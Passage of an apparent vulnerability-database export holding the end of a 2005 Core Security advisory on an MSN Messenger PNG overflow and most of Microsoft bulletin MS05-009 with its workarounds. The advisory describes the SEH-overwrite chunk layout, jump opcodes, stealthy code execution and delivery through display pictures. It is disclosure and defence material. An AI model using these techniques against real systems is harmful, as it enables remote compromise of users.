the\r\n protection seems to be overwriting the function pointer contained in\r\n that SEH record.\r\n\r\n To be precise, the exception is raised when the program tries to\r\n check the chunk's CRC32 and the exception code is 0xE06D7363.\r\n\r\n The tRNS chunk to accomplish the above strategy would look like the\r\n following:\r\n\r\n | chunk type |space for code|(1) SEH record | CRC32 |\r\n ["tRNS" 4 bytes][256+168 bytes ][next/eip: 8 bytes]\r\n\r\n The chunk type and crc32 fields are not copied into the stack.\r\n\r\n After taking control of the execution flow, [ESP+8] points to (1), so\r\n a possible structure for the fake SEH record could be:\r\n\r\n EB F9 ?? ?? XX XX XX XX\r\n\r\n Where EB F9 is the opcode for a jump to 5 bytes back, the next two\r\n bytes (?? ??) can have any value and the next 4 bytes are the address\r\n of a "jmp [esp+8]". In this way only a small portion of the program\r\n stack is modified and execution of arbitrary code is obtained.\r\n\r\n[Attack vectors]\r\n\r\n The vulnerability may be used to infect image files. This means that\r\n a valid PNG file could be modified to exploit vulnerable programs\r\n and still look as a harmless picture to other applications.\r\n\r\n There are 4 known attack vectors to trigger the vulnerability in\r\n the PNG image processing code:\r\n - Delivery of a malformed PNG image as display picture\r\n - Delivery of a malformed PNG image as a thumbnail\r\n - Delivery of a malformed PNG image as an icon\r\n - Delivery of a malformed PNG image as a regular file transfer\r\n offering\r\n\r\n[Detection of an attack]\r\n\r\n An important success factor for attacks targeting end-user\r\n applications is being unnoticeable by the user. Error messages,\r\n crashes and hangs are not desirable when attacking a server, but tend\r\n to be catastrophic to an attack whenever a user on the other side is\r\n interacting with the program being attacked.\r\n\r\n Some characteristics of this vulnerability and program design make\r\n the perpetration of stealth attacks easier. This means that it's\r\n possible to exploit the vulnerability, executing code while keeping\r\n the application running normally. There are several ways to achieve\r\n this:\r\n\r\n The basic idea is to return the execution flow to the application\r\n after creating a new thread or process. In the exploitation scheme\r\n described above, the code executed by the attacker may act as a\r\n legitimate exception handler by behaving in the following manner:\r\n\r\n 1. moves stack pointer to a lower address and saves registers.\r\n 2. performs the desired operations, i.e. creates a new thread.\r\n 3. reconstructs the overwritten SEH record.\r\n 4. recover saved register values, including the stack pointer.\r\n 5. returns a valid filter expression value (-1, 0 or 1) [5].\r\n\r\n Since delivery of an attack does not rely on any noticeable or\r\n suspicious network traffic outside of the normal behavior for the\r\n application's protocol, the only suitable way of detection from a\r\n network point of view is with the use of a proxy, IPS or firewall\r\n system with the capability of interpreting and normalizing the MSN\r\n Messenger protocol. In lieu of a patched client, attack detection\r\n should be based on the identification of malformed PNG images in\r\n MSN Messenger protocol traffic.\r\n\r\n The known attack vectors can be used to deliver successful attacks\r\n that are unnoticeable to the end user, not disrupting the execution\r\n of the MSN Messenger client running on the victim's computer and\r\n using it as a vantage point to compromise other clients by 'infecting'\r\n the victim's display picture.\r\n In this manner the vulnerability can be used to launch massive\r\n attacks using the application's underlying communications protocol as\r\n a delivery vector.\r\n Therefore, understanding the technical attributes for exploitation\r\n is also highly relevant to detect and prevent attacks.\r\n\r\n[Plausible exploit implementations]\r\n\r\n The code to exploit a server vulnerability usually involves\r\n implementing a limited portion of a network protocol that are in\r\n general, standard and well documented. Knowledge about encodings,\r\n languages and file formats are also needed to exploit browser or mail\r\n client flaws. However, even in those cases, the implementation\r\n complexity is low.\r\n\r\n In this case, crafting the malformed PNG image file seems simple but\r\n delivering the image to the victim through the Messenger protocol is\r\n somewhat a more difficult task.\r\n\r\n Alternatives to implementing an entire messenger client are:\r\n\r\n 1) using the standard client application to send the image.\r\n 2) using an open source third party client.\r\n 3) using a messenger protocol proxy.\r\n\r\n 1. In order to send the image using the standard client, it must be\r\n previously patched and modified to accept the infected image file as\r\n a display picture, emoticon or any other desired image type.\r\n\r\n 2. The difference with the previous option is that the modifications\r\n can be made easily.\r\n\r\n 3. The idea behind using a proxy is to avoid modifying a client, and\r\n being able to synchronize the other stages of an attack, as well as\r\n the possibility of using the same communication channel to control\r\n the victim's computer.\r\n A messenger protocol proxy can be used both to inject malformed PNG\r\n images to deliver an attack, or to sanitize outgoing traffic to\r\n prevent exploitation of third parties system.\r\n\r\n[Proof of Concept exploit code]\r\n\r\n To check if a MSN Messenger client is vulnerable, users can\r\n download the PNG image provided in the following URL\r\n\r\n http://www.coresecurity.com/corelabs/advisories/msn-vulncheck.zip\r\n\r\n The PNG image was built to work with MSN Messenger 6.2.0137.\r\n Once downloaded and uncompressed, open MSN Messenger, go to\r\n Tools->"Change display picture..." and select the file.\r\n\r\n On vulnerable clients either a message box will be shown or\r\n MSN Messenger will crash.\r\n\r\n\r\n*References*\r\n\r\n [1] libPNG 1.2.5 stack-based buffer overflow and other code concerns\r\n http://scary.beasts.org/security/CESA-2004-001.txt\r\n\r\n [2] Multiple buffer overflows in libpng 1.2.5\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0597\r\n\r\n [3] Portable Network Graphics (PNG) Specification and Extensions\r\n http://www.libpng.org/pub/png/spec/\r\n\r\n [4] MSDN Compiler Security Checks In Depth\r\n http://go.microsoft.com/fwlink/?Linkid=7260\r\n\r\n [5] Structured Exception Handling\r\n http://msdn.microsoft.com/library/en-us/debug/base/structured_exception_handling.asp \r\n\r\n http://www.microsoft.com/msj/0197/exception/exception.aspx\r\n http://msdn.microsoft.com/library/en-us/debug/base/using_an_exception_handler.asp\r\n\r\n [6] MSN Messenger protocol - display pictures\r\n http://www.hypothetic.org/docs/msn/phorum/read.php?f=1&i=7834&t=7834\r\n\r\n\r\n*About Core Security Technologies*\r\n\r\n Core Security Technologies develops strategic security solutions for\r\n Fortune 1000 corporations, government agencies and military\r\n organizations. The company offers information security software and\r\n services designed to assess risk and protect and manage information\r\n assets. Headquartered in Boston, MA, Core Security Technologies can\r\n be reached at 617-399-6980 or on the Web at\r\n http://www.coresecurity.com.\r\n\r\n To learn more about CORE IMPACT, the first comprehensive penetration\r\n testing product, visit:\r\n http://www.coresecurity.com/products/coreimpact\r\n\r\n*DISCLAIMER:*\r\n\r\n The contents of this advisory are copyright (c) 2005 CORE Security\r\n Technologies and may be distributed freely provided that no fee is\r\n charged for this distribution and proper credit is given.\r\n\r\n$Id: msn-png-advisory.txt,v 1.19 2005/02/08 19:14:02 iarce Exp $\r\n", "modified": "2005-02-09T00:00:00", "published": "2005-02-09T00:00:00", "id": "SECURITYVULNS:DOC:7775", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:7775", "title": "[VulnWatch] CORE-2004-0819: MSN Messenger PNG Image Parsing Vulnerability", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:11", "bulletinFamily": "software", "description": "Microsoft Security Bulletin MS05-009\r\nVulnerability in PNG Processing Could Allow Remote Code Execution (890261)\r\n\r\nIssued: February 8, 2005\r\nVersion: 1.0\r\n\r\nSummary\r\nWho should read this document: Customers who use Microsoft Windows Media Player, Windows Messenger and MSN Messenger\r\n\r\nImpact of Vulnerability: Remote Code Execution\r\n\r\nMaximum Severity Rating: Critical\r\n\r\nRecommendation: Customers should apply the update immediately\r\n\r\nSecurity Update Replacement: This bulletin replaces a prior security update. See the frequently asked questions (FAQ) section of this bulletin for the complete list.\r\n\r\nCaveats: None\r\n\r\nTested Software and Security Update Download Locations:\r\n\r\nAffected Software: \r\n\r\n\u2022 Microsoft Windows Media Player 9 Series (when running on Windows 2000, Windows XP Service Pack 1 and Windows Server 2003) \u2013 Download the update\r\n \r\n\u2022 Microsoft Windows Messenger version 5.0 (standalone version that can be installed on all supported operating systems) \u2013 Download the update\r\n \r\n\u2022 Microsoft MSN Messenger 6.1 \u2013 Download the update\r\n \r\n\u2022 Microsoft MSN Messenger 6.2 \u2013 Download the update\r\n \r\n\u2022 Microsoft Windows 98, Microsoft Windows 98 Second Edition (SE), and Microsoft Windows Millennium Edition (ME) \u2013 Review the FAQ section of this bulletin for details about these operating systems.\r\n \r\n\r\nNon-Affected Software: \r\n\r\n\u2022 Windows Media Player 6.4\r\n \r\n\u2022 Windows Media Player 7.1\r\n \r\n\u2022 Windows Media Player for Windows XP (8.0)\r\n \r\n\u2022 Windows Media Player 9 Series for Windows XP Service Pack 2\r\n \r\n\u2022 Windows Media Player 10\r\n \r\n\u2022 MSN Messenger for Mac\r\n \r\n\r\nTested Microsoft Windows Components:\r\n\r\nAffected Components:\r\n\r\n\u2022 Microsoft Windows Messenger version 4.7.0.2009 (when running on Windows XP Service Pack 1) \u2013 Download the update\r\n \r\n\u2022 Microsoft Windows Messenger version 4.7.0.3000 (when running on Windows XP Service Pack 2) \u2013 Download the update\r\n \r\n\r\nThe software in this list has been tested to determine if the versions are affected. Other versions either no longer include security update support or may not be affected. To determine the support lifecycle for your product and version, visit the following Microsoft Support Lifecycle Web site.\r\n\r\nTop of section\r\nGeneral Information\r\n Executive Summary \r\n\r\nExecutive Summary:\r\n\r\nThis update resolves a newly-discovered, public vulnerability. A remote code execution vulnerability exists in the processing of PNG image formats. The vulnerability is documented in the \u201cVulnerability Details\u201d section of this bulletin.\r\n\r\nAn attacker who successfully exploited this vulnerability could take complete control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\r\n\r\nSeverity Ratings and Vulnerability Identifiers:\r\n\r\nVulnerability Identifiers Impact of Vulnerability Windows Media Player 9 Series CAN-2004-1244 Windows Messenger (All affected versions) CAN-2004-0597 MSN Messenger 6.1 and 6.2 CAN-2004-0597 \r\nPNG Processing Vulnerability- CAN-2004-1244\r\n Remote Code Execution\r\n Critical\r\n\r\n None\r\n None\r\n \r\nPNG Processing Vulnerability- CAN-2004-0597\r\n Remote Code Execution\r\n\r\n None\r\n Moderate\r\n Critical\r\n\r\n \r\nAggregate Severity of All Vulnerabilities\r\n \r\n Critical\r\n Moderate\r\n\r\n Critical\r\n\r\n \r\n\r\nThis assessment is based on the types of systems that are affected by the vulnerability, their typical deployment patterns, and the effect that exploiting the vulnerability would have on them.\r\n\r\nTop of section\r\n Frequently asked questions (FAQ) related to this security update \r\n\r\nWhat updates does this release replace?\r\nThis security update replaces a prior security bulletin for Windows Media Player only. The security bulletin ID and version that is affected is listed in the following table.\r\n\r\nBulletin ID Windows Media Player 9 Series MSN Messenger 6.1 \r\nMS03-021\r\n Replaced\r\n \r\n \r\nMS04-010\r\n \r\n Replaced\r\n \r\n\r\nHow does the extended support for Windows 98, Windows 98 Second Edition, and Windows Millennium Edition affect the release of security updates for these operating systems?\r\nMicrosoft will only release security updates for critical security issues. Non-critical security issues are not offered during this support period. For more information about the Microsoft Support Lifecycle policies for these operating systems, visit the following Web site.\r\n\r\nFor more information about severity ratings, visit the following Web site.\r\n\r\nNote A Critical security update for these platforms is available and is provided as part of this security bulletin and can be downloaded from the Windows Update Web site.\r\n\r\nAre Windows 98, Windows 98 Second Edition, or Windows Millennium Edition critically affected by any of the vulnerabilities that are addressed in this security bulletin?\r\nYes. Windows 98, Windows 98 Second Edition, and Windows Millennium Edition are critically affected by this vulnerability. A Critical security update for these platforms is available and is provided as part of this security bulletin and can be downloaded from the Windows Update Web site.\r\nFor more information about severity ratings, visit the following Web site.\r\n\r\nHow can I get an update for MSN Messenger?\r\nAn update for MSN Messenger is available via the download link under the Affected Software section of this bulletin. Additionally, an updated version of MSN Messenger will be offered directly to customers when they log into MSN Messenger beginning shortly after this update is released.\r\n\r\nWhy is the update to Windows Messenger 5.0 an upgrade to version 5.1 instead of an update to 5.0?\r\nDue to the architecture of Windows Messenger 5.0, it is not possible to provide an incremental patch. Any fix to Windows Messenger 5.0 requires the deployment of a completely updated Windows Messenger package, in this case the Windows Messenger 5.1 package.\r\n\r\nWhat functionality changes will this new version of Windows Messenger contain?\r\nAs well as including the security fix pertaining to this bulletin; Windows Messenger 5.1 contains some additional bug fixes over Windows Messenger 5.0. Full details are on the Windows Messenger 5.1 download page.\r\n\r\nCan I use the Microsoft Baseline Security Analyzer (MBSA) to determine if this update is required?\r\nMBSA will determine if this update is required for Windows Media Player. MBSA will not determine if this update is required for Windows Messenger or MSN Messenger. It will provide a note message to this effect. See Microsoft Knowledge Base Article 306460 for information regarding note messages in MBSA.\r\n\r\nMicrosoft has made available an Enterprise Update Scanning Tool (EST) to assist customers with the detection of needed security updates not currently supported by MBSA.\r\n\r\nFor detailed information about the programs that MBSA currently does not detect, see Microsoft Knowledge Base Article 306460\r\n\r\nWhat is the Enterprise Update Scanning Tool (EST)?\r\nAs part of an ongoing commitment to provide detection tools for bulletin-class security updates, Microsoft delivers a stand-alone detection tool whenever the Microsoft Baseline Security Analyzer (MBSA) and the Office Detection Tool (ODT) cannot detect whether the update is required for an MSRC release cycle. This stand-alone tool is called the Enterprise Update Scanning Tool (EST) and is designed for enterprise administrators. When a version of the Enterprise Update Scanning Tool is created for a specific bulletin, customers can run the tool from a command line interface (CLI) and view the results of the XML output file. To help customers better utilize the tool, detailed documentation will be provided with the tool. There is also a version of the tool that SMS customers can obtain that offers an integrated experience for SMS administrators.\r\n\r\nCan I use a version of the Enterprise Update Scanning Tool (EST) to determine whether this update is required?\r\nYes. Microsoft has created a version of the EST that will determine if you need to apply this update for all of the products listed under Affected Products above. Microsoft Knowledge Base Article 984193 describes the EST in detail, as well as provides a download link to the tool. There is also a version of this tool that SMS customers can obtain. See the following Microsoft Knowledge Base Article 894154.\r\n\r\nCan I use Systems Management Server (SMS) to determine if this update is required?\r\nYes. SMS can help detect and deploy this security update. SMS uses MBSA for detection; therefore, SMS has the same limitation listed earlier in this bulletin related to programs that MBSA does not detect. Additionally, there is a version of the EST that SMS customers can obtain that offers an integrated experience for SMS administrators. \r\nFor information about SMS, visit the SMS Web site.\r\n\r\nThe Security Update Inventory Tool is required for detecting Microsoft Windows and other affected Microsoft products. For more information about the limitations of the Security Update Inventory Tool, see Microsoft Knowledge Base Article 306460\r\n\r\nTop of section\r\n Vulnerability Details \r\n\r\n PNG Processing Vulnerability in Windows Media Player - CAN-2004-1244: \r\n\r\nA remote code execution vulnerability exists in Windows Media Player because it does not properly handle PNG files with excessive width or height values. An attacker could try to exploit the vulnerability by constructing a malicious PNG that could potentially allow remote code execution if a user visited a malicious Web site or clicked a link in a malicious e-mail message. An attacker who successfully exploited this vulnerability could take complete control of an affected system.\r\n\r\n Mitigating Factors for PNG Processing Vulnerability in Windows Media Player- CAN-2004-1244: \r\n\r\n\u2022 In a Web-based attack scenario, an attacker would have to host a Web site that contains a Web page that is used to exploit this vulnerability through media containing a reference to a malicious PNG file. An attacker would have no way to force users to visit a Web site. Instead, an attacker would have to persuade them to visit the Web site, typically by getting them to click a link that takes them to the attacker's site or to a site that has been compromised by the attacker.\r\n \r\n\u2022 An attacker who successfully exploited this vulnerability could gain the same user rights as the local user. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.\r\n \r\n\r\nTop of section\r\n Workarounds for PNG Processing Vulnerability in Windows Media Player - CAN-2004-1244: \r\n\r\nMicrosoft has tested the following workarounds. While these workarounds will not correct the underlying vulnerability, they help block known attack vectors. When a workaround reduces functionality, it is identified below.\r\n\r\nThere are several different attack vectors that Microsoft has identified for this vulnerability. Each attack vector has a different workaround.\r\n\r\n Static WMP File Extension Attack workaround \r\n\r\nDisassociate the WMP file extensions.\r\nDisassociate the file extensions (.ASX, .WAX, .WVX, .WPL, .WMX, .WMS, .WMZ) in Windows to avoid previewing or opening files that point to malformed PNG files.\r\n\r\nManual Steps \u2013 Windows Media Player method:\r\n\r\n\u2022 Launch Windows Explorer\r\n \r\n\u2022 On the Tools Menu select \u2018Folder Options\u2019\r\n \r\n\u2022 Select the \u2018File Types\u2019 tab\r\n \r\n\u2022 Scroll to find the .ASX file extension and then press the \u2018Delete\u2019 button\r\n \r\n\u2022 Repeat step 4 for each of the file extensions listed above.\r\n \r\n\r\nIn addition, enterprise customers can configure Outlook to block the dangerous files listed using the steps documented in Microsoft Knowledgebase Article 837388. Use these instructions to add the documented file extensions to the Level1 block list.\r\n\r\nHome users can configure Outlook Express to block the dangerous files listed using the steps documented in Microsoft Knowledge Base Article 291387. Use this information to configure each of the file extensions as \u2018confirm open after download\u2019 in the Windows file types dialog.\r\n\r\nImpact of Workaround: Deleting the file associations with Media Player has a high potential for breaking corporate users who may be using Windows Media Server / Player to deliver web casts, training etc.\r\n\r\nHome users trying to watch streaming content on various Web sites may also be impacted by implementing this workaround.\r\n\r\nTop of section\r\n Internet Explorer workaround for WMP ActiveX attack \r\n\r\nDisable the Windows Media Player ActiveX Control. To prevent against an attack within a webpage follow these steps to disable the Windows Media Player ActiveX Control:\r\n\r\nFollow the instructions documented in Microsoft Knowledge Base Article 240797 to killbit the following CLSIDs in Internet Explorer:\r\n\r\nCLSID:{6BF52A52-394A-11D3-B153-00C04F79FAA6}PROGID:WMPlayer.OCX.7\r\nCLSID:{22D6F312-B0F6-11D0-94AB-0080C74C7E95}PROGID:MediaPlayer.MediaPlayer.1\r\nCLSID:{05589FA1-C356-11CE-BF01-00AA0055595A}PROGID:AMOVIE.ActiveMovieControl.2\r\n\r\nImpact of Workaround:\r\n\r\nWhen you disable the Windows Media Player ActiveX control, pages using this control will no longer function as designed. This prevents any content from being played though the control, including audio and video.\r\n\r\nTop of section\r\n Content-Type HTTP Header Attack \r\n\r\nThe only way to prevent this attack is to remove all of the possible MIME type entries from the registry that associate Windows Media Player with the MIME type listed in the Content-Type header being returned by the server since they all can be abused to exploit the vulnerability. Below is a list of MIME types that are associated with the WMP CLSID.\r\n\r\nHKEY_CLASSES_ROOT\MIME\Database\Content Type\application/vnd.ms-wpl\r\nHKEY_CLASSES_ROOT\MIME\Database\Content Type\application/x-mplayer2\r\nHKEY_CLASSES_ROOT\MIME\Database\Content Type\application/x-ms-wmd\r\nHKEY_CLASSES_ROOT\MIME\Database\Content Type\application/x-ms-wmz\r\nHKEY_CLASSES_ROOT\MIME\Database\Content Type\audio/aiff\r\nHKEY_CLASSES_ROOT\MIME\Database\Content Type\audio/basic\r\nHKEY_CLASSES_ROOT\MIME\Database\Content Type\audio/mid\r\nHKEY_CLASSES_ROOT\MIME\Database\Content Type\audio/midi\r\nHKEY_CLASSES_ROOT\MIME\Database\Content Type\audio/mp3\r\nHKEY_CLASSES_ROOT\MIME\Database\Content Type\audio/mpeg\r\nHKEY_CLASSES_ROOT\MIME\Database\Content Type\audio/mpegurl\r\nHKEY_CLASSES_ROOT\MIME\Database\Content Type\audio/mpg\r\nHKEY_CLASSES_ROOT\MIME\Database\Content Type\audio/wav\r\nHKEY_CLASSES_ROOT\MIME\Database\Content Type\audio/x-aiff\r\nHKEY_CLASSES_ROOT\MIME\Database\Content Type\audio/x-mid\r\nHKEY_CLASSES_ROOT\MIME\Database\Content Type\audio/x-midi\r\nHKEY_CLASSES_ROOT\MIME\Database\Content Type\audio/x-mp3\r\nHKEY_CLASSES_ROOT\MIME\Database\Content Type\audio/x-mpeg\r\nHKEY_CLASSES_ROOT\MIME\Database\Content Type\audio/x-mpegurl\r\nHKEY_CLASSES_ROOT\MIME\Database\Content Type\audio/x-mpg\r\nHKEY_CLASSES_ROOT\MIME\Database\Content Type\audio/x-ms-wax\r\nHKEY_CLASSES_ROOT\MIME\Database\Content Type\audio/x-ms-wma\r\nHKEY_CLASSES_ROOT\MIME\Database\Content Type\audio/x-wav\r\nHKEY_CLASSES_ROOT\MIME\Database\Content Type\midi/mid\r\nHKEY_CLASSES_ROOT\MIME\Database\Content Type\video/avi\r\nHKEY_CLASSES_ROOT\MIME\Database\Content Type\video/mpeg\r\nHKEY_CLASSES_ROOT\MIME\Database\Content Type\video/mpg\r\nHKEY_CLASSES_ROOT\MIME\Database\Content Type\video/msvideo\r\nHKEY_CLASSES_ROOT\MIME\Database\Content Type\video/x-ivf\r\nHKEY_CLASSES_ROOT\MIME\Database\Content Type\video/x-mpeg\r\nHKEY_CLASSES_ROOT\MIME\Database\Content Type\video/x-mpeg2a\r\nHKEY_CLASSES_ROOT\MIME\Database\Content Type\video/x-ms-asf\r\nHKEY_CLASSES_ROOT\MIME\Database\Content Type\video/x-ms-asf-plugin\r\nHKEY_CLASSES_ROOT\MIME\Database\Content Type\video/x-msvideo\r\nHKEY_CLASSES_ROOT\MIME\Database\Content Type\video/x-ms-wm\r\nHKEY_CLASSES_ROOT\MIME\Database\Content Type\video/x-ms-wmp\r\nHKEY_CLASSES_ROOT\MIME\Database\Content Type\video/x-ms-wmv\r\nHKEY_CLASSES_ROOT\MIME\Database\Content Type\video/x-ms-wmx\r\nHKEY_CLASSES_ROOT\MIME\Database\Content Type\video/x-ms-wvx\r\n\r\nImpact of Workaround:\r\n\r\n\u2022 These MIME type registry keys all have a CLSID value which points to the following CLSID:\r\nHKEY_CLASSES_ROOT\CLSID\{CD3AFA8F-B84F-48F0-9393-7EDC34128127}\InprocServer32\r\nThis CLSID is associated with WMP.DLL which is responsible for launching Windows Media Player when these MIME types are used. Un-registering WMP.DLL will break Windows Media Player.\r\n \r\n\u2022 The MIME types listed in this workaround are specific to Windows XP. There may be additional MIME types available on other platforms.\r\n \r\n\r\nAdditional information about Windows Media Player File Name Extensions if available at the following MSDN Web site.\r\n\r\nTop of section\r\nTop of section\r\n FAQ for PNG Processing Vulnerability in Windows Media Player - CAN-2004-1244: \r\n\r\nWhat is the scope of the vulnerability? \r\nThis is a remote code execution vulnerability. An attacker who successfully exploited this vulnerability could take complete control of an affected system.\r\n\r\nWhat causes the vulnerability?\r\nWindows Media Player does not completely validate PNG image formats with a excessive width or height values.\r\n\r\nWhat is PNG?\r\nPNG stands for Portable Network Graphics. The Portable Network Graphics (PNG) format was designed to replace the older and simpler GIF format and, to some extent, the much more complex TIFF format. Additional information about PNG can be found at the following Web site.\r\n\r\nWhat might an attacker use the vulnerability to do?\r\nAn attacker who successfully exploited this vulnerability could take complete control of the affected system.\r\n\r\nWho could exploit the vulnerability?\r\nAny anonymous user who could host a malformed PNG file on a Web site, network share, or persuade a user to open a PNG file that is sent as an attachment in email could seek to exploit this vulnerability.\r\n\r\nHow could an attacker exploit the vulnerability?\r\nAn attacker could exploit the vulnerability by hosting a specially crafted PNG file on a Web site or network share, and entice a user to visit that Web site. Additionally, and attacker could send a link to a malicious PNG file in an email message and entice a user to click on the link.\r\n\r\nWhat systems are primarily at risk from the vulnerability?\r\nWorkstations and terminal servers are primarily at risk. Servers could be at more risk if users who do not have sufficient administrative credentials are given the ability to log on to servers and run programs. However, best practices strongly discourage allowing this.\r\n\r\nAre Windows 98, Windows 98 Second Edition or Windows Millennium Edition critically affected by this vulnerability?\r\nWindows 98 is not critically affected by this vulnerability, however Windows 98 Second Edition, and Windows Millennium Edition are. A Critical security update for these platforms is available and is provided as part of this security bulletin and can be downloaded from the Windows Update Web site.\r\nFor more information about severity ratings, visit the following Web site.\r\n\r\nWhat does the update do?\r\nThe update addresses the vulnerability by modifying the way that Windows Media Player validates the width and height of a PNG file\r\n\r\nWhen this security bulletin was issued, had this vulnerability been publicly disclosed?\r\nA vulnerability similar to this has been publicly released and assigned Common Vulnerability and Exposure number CAN-2004-0597.\r\n\r\nIs this vulnerability the same as the vulnerability described in CAN-2004-0597?\r\nWhile similar to the vulnerability described here, Windows Media Player does not use or incorporate the affected libpng library. However, Windows Media Player is configured in such a way that makes it susceptible to the vulnerability described here.\r\n\r\nWhen this security bulletin was issued, had Microsoft received any reports that this vulnerability was being exploited?\r\nNo. Microsoft had not received any information to indicate that this vulnerability had been publicly used to attack customers and had not seen any examples of proof of concept code published when this security bulletin was originally issued.\r\n\r\nTop of section\r\nTop of section\r\n PNG Processing Vulnerability in Windows Messenger - CAN-2004-0597: \r\n\r\nA remote code execution vulnerability exists in Windows Messenger because it does not properly handle corrupt or malformed PNG files. An attacker who successfully exploited this vulnerability could take complete control of an affected system.\r\n\r\n Mitigating Factors for PNG Processing Vulnerability in Windows Messenger - CAN-2004-0597 : \r\n\r\n\u2022 The nature of the vulnerability is different in Windows Messenger than in MSN Messenger or Windows Media Player. The vulnerability in Windows Messenger would be very complex to exploit and requires a large amount of effort and knowledge about the internal network of an organization to attempt to exploit this vulnerability.\r\n \r\n\u2022 A user would have to be running Windows Messenger and have it configured to receive .NET Alerts.\r\n \r\n\r\nTop of section\r\n Workarounds for PNG Processing Vulnerability in Windows Messenger - CAN-2004-0597 : \r\n\r\nMicrosoft has tested the following workarounds. While these workarounds will not correct the underlying vulnerability, they help block known attack vectors. When a workaround reduces functionality, it is identified below.\r\n\r\nTurn off the .NET Alerts feature in Windows Messenger.\r\n\r\n\u2022 Open Windows Messenger\r\n \r\n\u2022 Go to the Tools menu and select \u201cOptions\u201d\r\n \r\n\u2022 In the Options Dialog go to the \u201cPrivacy\u201d tab.\r\n \r\n\u2022 Check the option that says \u201cDon\u2019t download any tabs to my computer\u201d\r\n \r\n\r\nNote this setting will take effect the next time you sign into Windows Messenger.\r\n.Net Alerts are only available on Passport accounts that have signed up to receive them. Users who have never configured their account to receive these alerts will not have this setting available.\r\n\r\nTop of section\r\n FAQ for PNG Processing Vulnerability in Windows Messenger - CAN-2004-0597: \r\n\r\nWhat is the scope of the vulnerability?\r\nThis is a remote code execution vulnerability. An attacker who successfully exploited this vulnerability could take complete control of an affected system.\r\n\r\nWhat causes the vulnerability?\r\nWindows Messenger implements the public lipng 1.2.5 version library that is recently found to have several known vulnerabilities.\r\n\r\nWhat is PNG?\r\nPNG stands for Portable Network Graphics. The Portable Network Graphics (PNG) format was designed to replace the older and simpler GIF format and, to some extent, the much more complex TIFF format. Additional information about PNG can be found at the following Web site.\r\n\r\nWhat might an attacker use the vulnerability to do?\r\nAn attacker who successfully exploited this vulnerability could take complete control of the affected system.\r\n\r\nWho could exploit the vulnerability?\r\nThe vulnerability in Windows Messenger would be very complex to exploit and requires a large amount of effort and knowledge about the internal network of an organization to attempt to exploit this vulnerability. An attacker would either need the ability to spoof the .NET Messenger service, or would have to intercept and rewrite communications between the client and the server. Simply sending a malformed PNG image file to Windows Messenger does not exploit this vulnerability.\r\n\r\nWhat systems are primarily at risk from the vulnerability?\r\nWorkstations and terminal servers are primarily at risk. Servers could be at more risk if users who do not have sufficient administrative credentials are given the ability to log on to servers and run programs. However, best practices strongly discourage allowing this.\r\n\r\nAre Windows 98, Windows 98 Second Edition or Windows Millennium Edition critically affected by this vulnerability?\r\nNo. None of these vulnerabilities are critical in severity on Windows 98, on Windows 98 Second Edition, or on Windows Millennium Edition. For more information about severity ratings, visit the following Web site.\r\n\r\nCould the vulnerability be exploited over the Internet? \r\nNo. An attacker would either need the ability to spoof the .NET Messenger service, or would have to intercept and rewrite communications between the client and the server.\r\nSimply sending a malformed PNG to Windows Messenger does not exploit this vulnerability. Microsoft has provided information about how you can help protect your PC. End users can visit the Protect Your PC Web site. IT Professionals can visit the Security Guidance Center Web site.\r\n\r\nWhat does the update do?\r\nThe update addresses the vulnerability by updating the library used by Windows Messenger to one that completely validates the PNG image file that is being processed. Additionally, Windows Messenger will now validate that PNG image files are properly formatted.\r\n\r\nWhen this security bulletin was issued, had this vulnerability been publicly disclosed?\r\nThese vulnerabilities have been publicly released and assigned Common Vulnerability and Exposure number CAN-2004-0597, CAN-2004-0598 and CAN-2004-0599.\r\n\r\nWhen this security bulletin was issued, had Microsoft received any reports that this vulnerability was being exploited?\r\nNo. Microsoft had not received any information to indicate that this vulnerability had been publicly used to attack customers and had not seen any examples of proof of concept code published when this security bulletin was originally issued.\r\n\r\nTop of section\r\nTop of section\r\n PNG Processing Vulnerability in MSN Messenger - CAN-2004-0597: \r\n\r\nA remote code execution vulnerability exists in MSN Messenger because it does not properly handle corrupt or malformed PNG image files. An attacker who successfully exploited this vulnerability could take complete control of an affected system.\r\n\r\n Mitigating Factors for PNG Processing Vulnerability in MSN Messenger - CAN-2004-0597: \r\n\r\n\u2022 MSN Messenger, by default, does not allow anonymous people to send you messages. An attacker would first need to entice you to add them to your contacts list.\r\n \r\n\r\nTop of section\r\n Workarounds for PNG Processing Vulnerability in MSN Messenger - CAN-2004-0597: \r\n\r\nMicrosoft has tested the following workarounds. While these workarounds will not correct the underlying vulnerability, they help block known attack vectors. When a workaround reduces functionality, it is identified below.\r\n\r\n\u2022 Do not add addresses that you do not recognize or trust to your contacts list.\r\n \r\n\u2022 Review all of the contacts currently in your contact list and remove or block any that you do not know, do not trust or no longer need.\r\n \r\n\u2022 Disable display picture in MSN Messenger using the following steps:\r\n\r\nClick Tools. Click Options. Click the Personal Tab\r\n\r\nClear the check box \u2018Show Display Picture from Others in Instant Message Conversations\u2019.\r\n \r\n\u2022 Disable Emoticons using the following steps:\r\n\r\nClick Tools. Click Options. Click the Messages Tab\r\n\r\nClear the check box \u2018Show emoticons in instant messages\u2019\r\n\r\nClear the check box \u2018Show custom emoticons in instant message\u2019.\r\n \r\n\u2022 Do not agree to accept file transfers from contacts you do not know or trust.\r\n \r\n\r\nTop of section\r\n FAQ for PNG Processing Vulnerability in MSN Messenger - CAN-2004-0597: \r\n\r\nIs the MSN Messenger 7.0 beta affected by this vulnerability?\r\nNo. This vulnerability was reported prior to the release of the MSN Messenger 7.0 beta, and is therefore already incorporated into that product version.\r\n\r\nWhat is the scope of the vulnerability?\r\nThis is a remote code execution vulnerability. An attacker who successfully exploited this vulnerability could take complete control of an affected system.\r\n\r\nWhat causes the vulnerability?\r\nMSN Messenger implements the public lipng 1.2.5 version library that is recently found to have several known vulnerabilities.\r\n\r\nWhat is PNG?\r\nPNG stands for Portable Network Graphics. The Portable Network Graphics (PNG) format was designed to replace the older and simpler GIF format and, to some extent, the much more complex TIFF format. Additional information about PNG can be found at the following Web site.\r\n\r\nWhat might an attacker use the vulnerability to do?\r\nAn attacker who successfully exploited this vulnerability could take complete control of the affected system.\r\n\r\nWho could exploit the vulnerability?\r\nAn 